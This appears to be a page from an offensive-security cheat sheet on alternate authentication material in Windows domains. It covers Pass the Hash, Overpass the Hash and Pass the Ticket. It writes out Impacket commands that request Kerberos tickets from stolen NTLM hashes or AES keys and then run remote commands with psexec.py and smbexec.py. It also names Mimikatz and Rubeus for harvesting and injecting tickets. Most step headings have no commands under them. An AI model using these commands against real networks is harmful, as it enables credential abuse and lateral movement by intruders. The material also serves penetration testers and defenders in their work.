Use Alternate Authentication Material
Application Access Token
Pass the Hash
Overpass The Hash/Pass The Key (PTK)
Impacket
Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passpython smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-passRubeus and PsExec
Ask and inject the ticket
Execute a cmd in the remote machine
Pass the Ticket
Pass The Ticket (PTT)
Harvest tickets from Linux
Check type and location of tickets:
If none return, default is
FILE:/tmp/krb5cc_%{uid}.In case of file tickets, you can copy-paste (if you have permissions) for use them.
In case of being
*KEYRING*tickets, you can use tickey to get them:
Harvest tickets from Windows
With Mimikatz:
With Rubeus in Powershell:
After dump with Rubeus tickets in base64, to write the in a file
To convert tickets between Linux/Windows format with ticket_converter.py:
Using ticket in Linux:
Set the ticket for impacket use
Execute remote commands with any of the following by using the TGT
Using ticket in Windows
Inject ticket with Mimikatz:
Inject ticket with Rubeus:
Execute a cmd in the remote machine with PsExec:
Web Session Cookie
Last updated
Was this helpful?